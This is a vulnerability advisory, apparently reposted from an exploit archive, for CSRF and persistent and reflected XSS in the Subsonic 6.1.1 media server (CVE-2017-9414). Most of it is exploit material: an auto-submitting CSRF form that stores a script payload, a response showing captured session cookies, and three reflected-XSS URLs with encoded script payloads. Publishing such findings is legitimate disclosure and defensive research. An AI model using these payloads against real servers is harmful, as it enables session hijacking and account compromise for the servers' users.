Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities

[+] Credits: John Page a.k.a hyp3rlinx  

 
Vendor:
================
www.subsonic.org
 
 
 Product:
===============
subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
  
 
Vulnerability Type:
======================
CSRF - Persistent XSS
 
  
CVE Reference:
==============
CVE-2017-9414
 
 
 
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads 
if an authenticated user clicks a malicious link or visits an attacker controlled webpage. 
 
 
 
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
 
Then visit http://localhost:4040/index.view
 
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
 
 
Misc Reflected:
 
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E

#  0day.today [2018-01-04]  #